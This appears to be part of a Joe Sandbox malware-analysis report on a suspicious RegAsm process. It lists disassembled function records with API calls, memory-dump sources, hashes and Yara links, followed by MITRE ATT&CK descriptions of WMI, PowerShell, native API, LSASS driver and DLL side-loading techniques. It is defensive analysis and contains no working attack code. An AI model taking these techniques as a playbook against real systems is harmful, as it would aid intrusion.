Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0K.l
API String ID: 1967447596-3802358211
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 3f2d78cd1fb65c7ca0e2abcab1b8de49ed22ff26e39667f4b7bf9b24bfac6418
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 14E026F1A2030D0A9B0C9C799C8E92A71CC8B156EC7084A35EC26F3FC8FA34F5808051

Function 6C305900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C3251C8), ref: 6C30591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C30592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C305915

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 0beeabc44f517ef4e40a2b92637cbce79dd6a05e992d7abae4579528f47af607
Instruction ID: d518b8ed70a785f212904b70369993c62b7e5d72cdd3d02cf17f9c0783d31b22
Opcode Fuzzy Hash: 0beeabc44f517ef4e40a2b92637cbce79dd6a05e992d7abae4579528f47af607
Instruction Fuzzy Hash: 69E09231204640A7CF004A68C5087457BECAB2232AF144508E46993A81C3BD68408F95

Function 6C2B3850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C32F860), ref: 6C2B385C
ReleaseSRWLockExclusive.KERNEL32(6C32F860,?), ref: 6C2B3871

Strings

,2l, xrefs: 6C2B387A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,2l
API String ID: 17069307-1254850157
Opcode ID: b676b0ea245a2c7151f25acbe2436e7848203b3f3cb56887dfc4828663537396
Instruction ID: 151bce7629f89ae99c3a059eaf19504ab0b2f90abceefa200657b6b49094607a
Opcode Fuzzy Hash: b676b0ea245a2c7151f25acbe2436e7848203b3f3cb56887dfc4828663537396
Instruction Fuzzy Hash: 5EE0D83590172C978F019F6694025867B7CFE0BAD93044109F91A2B900CB3CD0408AC6

Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

!=A, xrefs: 00413C82

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: !=A
API String ID: 3840410801-2919091325
Opcode ID: ec3eb8fcd7deb6c29ac1391ae926f32523ec5629f39bf7b4dfd2b3276f6df592
Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
Opcode Fuzzy Hash: ec3eb8fcd7deb6c29ac1391ae926f32523ec5629f39bf7b4dfd2b3276f6df592
Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95

Function 6C2BBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C2BBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C2BBEF5

Strings

cryptbase.dll, xrefs: 6C2BBEF0

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 30d1b960f3bfc1ecea7312964050c68cdcf64cd3b718f45f2ee057a30bc4ae9c
Instruction ID: ebc5559c839284704b8af44aeb287539dd4b6441bf47e4f1f7dbb99d0ec213d9
Opcode Fuzzy Hash: 30d1b960f3bfc1ecea7312964050c68cdcf64cd3b718f45f2ee057a30bc4ae9c
Instruction Fuzzy Hash: 63D0C73119510CEADF406A509D05F153778A70175DF50C025F75658961C7B5A450CF54

Function 6C2A50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C2A4E9C,?,?,?,?,?), ref: 6C2A510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C2A4E9C,?,?,?,?,?), ref: 6C2A5167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C2A5196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C2A4E9C), ref: 6C2A5234

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: b5f37d4dfad39417f5c7743a8fdac4322db0b7d13da84dca0c7cc84d24e8ac77
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: D991AD75505A5ACFCB14CF0CC490A6ABBA1FF89318B2885A8EC589B715D331FC42CBE0

Function 6C2E08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E7DC), ref: 6C2E0918
LeaveCriticalSection.KERNEL32(6C32E7DC), ref: 6C2E09A6
EnterCriticalSection.KERNEL32(6C32E7DC,?,00000000), ref: 6C2E09F3
LeaveCriticalSection.KERNEL32(6C32E7DC), ref: 6C2E0ACB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 337c750a0fbbf68bf6eafac9a762b6a5552c0c599c4550cc87227f23c0720d5d
Instruction ID: feeedd69862710f6d7783ae8665be4de586477802b81f412305684e4297e1d0a
Opcode Fuzzy Hash: 337c750a0fbbf68bf6eafac9a762b6a5552c0c599c4550cc87227f23c0720d5d
Instruction Fuzzy Hash: AB515D3271176D8BEF04DE69C440A6573B9EB89F26765413DDE65A7F80CF34E80296C0

Function 6C3059C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C2DE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C305A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C2DE56A,?,|UrlbarCSSSpan), ref: 6C305A5C
free.MOZGLUE(?), ref: 6C305A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C305B9D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 9e20f2fd33f9a1958e96833c2e0ffbe311d46fffbf4b2cf14b628c782b9e414c
Instruction ID: 454ac157ad5ab86b585bf2a3f3cd2e0c0dc83e14b414dd0ec2f31995086a2a84
Opcode Fuzzy Hash: 9e20f2fd33f9a1958e96833c2e0ffbe311d46fffbf4b2cf14b628c782b9e414c
Instruction Fuzzy Hash: 34517D716087409FDB01CF29C8C1B1AB7E8EF8A318F04CA6DE8889B646D775D945CF66

Function 6C2FB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C2FB2C9,?,?,?,6C2FB127,?,?,?,?,?,?,?,?,?,6C2FAE52), ref: 6C2FB628

Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F90FF
Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C2FB2C9,?,?,?,6C2FB127,?,?,?,?,?,?,?,?,?,6C2FAE52), ref: 6C2FB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C2FB2C9,?,?,?,6C2FB127,?,?,?,?,?,?,?,?,?,6C2FAE52), ref: 6C2FB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C2FB127,?,?,?,?,?,?,?,?), ref: 6C2FB74D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 9c1cb289e75832b84ed5616c64cc6fd60cf3a07fb743f7f936e0d1886aa524ef
Instruction ID: 98435da79194eea8a5cd9c52924d2ff2a3ba62d0ddd7cbca44a86ba02276f94d
Opcode Fuzzy Hash: 9c1cb289e75832b84ed5616c64cc6fd60cf3a07fb743f7f936e0d1886aa524ef
Instruction Fuzzy Hash: 2551BC72A4121ECBDB14CF18C98466EF7B9AF45305F05852DDC6AAB700DB31E806CBA1

Function 6C2FDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C2EFF2A), ref: 6C2FDFFD

Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F90FF
Part of subcall function 6C2F90E0: free.MOZGLUE(?,00000000,?,?,6C2FDEDB), ref: 6C2F9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2EFF2A), ref: 6C2FE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2EFF2A), ref: 6C2FE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C2EFF2A), ref: 6C2FE0FE

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: f198550d72ad7c88c981ceef5acb9daad15b2ece170ceee59f7744a5cefad0bc
Instruction ID: 90a2a26800f505dab12bdeb6f00899963f1b0443be0309e7a84f918620aa2451
Opcode Fuzzy Hash: f198550d72ad7c88c981ceef5acb9daad15b2ece170ceee59f7744a5cefad0bc
Instruction Fuzzy Hash: 3841937164421E8FEB16CF58D88075AB7BAAB45308F14453DD926EB740EB31E906CB92

Function 6C306180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C3061DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C30622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C306250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C306292

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 5ef87c6c6d87ae1c9466e2a7e72118454bcbcc14c8f7efa0c38e351909d54408
Instruction ID: e2c8af92eaa7fcafb2aae6854fa031aea65278c02d5d7ca830792da99c01f19e
Opcode Fuzzy Hash: 5ef87c6c6d87ae1c9466e2a7e72118454bcbcc14c8f7efa0c38e351909d54408
Instruction Fuzzy Hash: C331D672B0460A8FDB04CF28D8806AA73F9FB95308F118539D95AD7656EB31E598CB50

Function 6C2F6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C2F6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C2F6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C2F6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2F6F5C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 6eb0c4cba5c7c9f2c1b9be778bb8d06eeba8f3125036720713d5700e5e5d39b0
Instruction ID: f2d278a94c8e4539d547b5d0eee07b2497fc25fcfa555fa3288373640c33c52e
Opcode Fuzzy Hash: 6eb0c4cba5c7c9f2c1b9be778bb8d06eeba8f3125036720713d5700e5e5d39b0
Instruction Fuzzy Hash: C431E971A1050E8FEB04CF2CD980AAAB3E9EB85305F50863DD826C7651EB31E55AC790

Function 6C30B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C2B0A4D), ref: 6C30B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C2B0A4D), ref: 6C30B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C2B0A4D), ref: 6C30B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C2B0A4D), ref: 6C30B67F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 89314ec8015c39f66f0faeb70b92c24957424241d788ee0e9eb1a4614dd49834
Instruction ID: fce235722148df7be2e073ef2be901a054cb85977d0e436e636e118bc505b36b
Opcode Fuzzy Hash: 89314ec8015c39f66f0faeb70b92c24957424241d788ee0e9eb1a4614dd49834
Instruction Fuzzy Hash: A031B472A0121A8FEB10CF58C85469AFBB9FF81318F168569C8069F601DB31E915CFE1

Function 6C2DF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C2DF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C2DF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C2DF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C2DF668

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 0152aeb30fadee8e7e195f6c0fa4ccf264c37dc1fefd67d6d3f09dbb5733b7de
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 79314F71A10218AFC714CF5DDCC0E9B77B9EB94354B188939FA498BB04D631F9448B94

Function 6C2BB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C2BB96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C2BB99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C2BB9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2BB9B9

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 66421aacc245a77aa5a75646e68867adb4ee9da9c92f46fe7154328fb3d40c93
Instruction ID: ad90c2bbd6d9f02f09eef4efc0ec756ec5a0b1d8f110109ba198dc60ccce1dad
Opcode Fuzzy Hash: 66421aacc245a77aa5a75646e68867adb4ee9da9c92f46fe7154328fb3d40c93
Instruction Fuzzy Hash: 601172B1A002099FCB04DF69D88089BB7F8BF88354B14893AE919D3701D731E919CAA1

Function 6C2F26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2F26C1
free.MOZGLUE(?), ref: 6C2F26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2F26FF
free.MOZGLUE ref: 6C2F270D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9c2d2d38bdcfde4b02af09ba2cfbaefd21ad1957437c46bce5b076a5ffed1d91
Instruction ID: b995fed54a4560f2cdc99d6994f2dda164aebc67379547e91f57817e44efff08
Opcode Fuzzy Hash: 9c2d2d38bdcfde4b02af09ba2cfbaefd21ad1957437c46bce5b076a5ffed1d91
Instruction Fuzzy Hash: 2DF0F9F2B4124D5BFB009A18E88494BF3ADEF42219B500035FE26C3B01E332F91AC696

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
